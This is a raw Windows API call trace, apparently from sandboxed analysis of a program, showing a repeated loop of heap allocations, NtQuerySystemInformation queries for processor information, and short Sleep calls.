0x29585b8 [0201.745] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.745] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.745] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.745] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.746] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.746] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.746] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.746] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.750] Sleep (dwMilliseconds=0x110) [0201.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.770] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.771] Sleep (dwMilliseconds=0x110) [0201.790] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.790] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.791] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.791] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.791] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.801] Sleep (dwMilliseconds=0x110) [0201.821] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0201.822] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.822] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.822] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0201.822] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.823] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.823] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0201.823] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0201.824] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.824] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0201.824] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0201.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.945] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0201.946] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0201.946] Sleep (dwMilliseconds=0x110) [0202.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.004] Sleep (dwMilliseconds=0x110) [0202.443] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.443] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.448] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.449] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.449] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.450] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.453] Sleep (dwMilliseconds=0x110) [0202.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.522] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.522] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.524] Sleep (dwMilliseconds=0x110) [0202.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.585] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.585] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.586] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.586] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.590] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.590] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.590] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.594] Sleep (dwMilliseconds=0x110) [0202.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.629] Sleep (dwMilliseconds=0x110) [0202.695] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.695] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.696] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.697] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.697] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.697] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.697] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.697] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.698] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.698] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.698] Sleep (dwMilliseconds=0x110) [0202.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.723] Sleep (dwMilliseconds=0x110) [0202.757] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.757] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.757] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.757] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.757] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.758] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.758] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.758] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.759] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.759] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.759] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.760] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.760] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.760] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.760] Sleep (dwMilliseconds=0x110) [0202.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0202.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.803] Sleep (dwMilliseconds=0x110) [0202.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0202.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0202.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0202.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0202.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0202.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0202.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0202.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 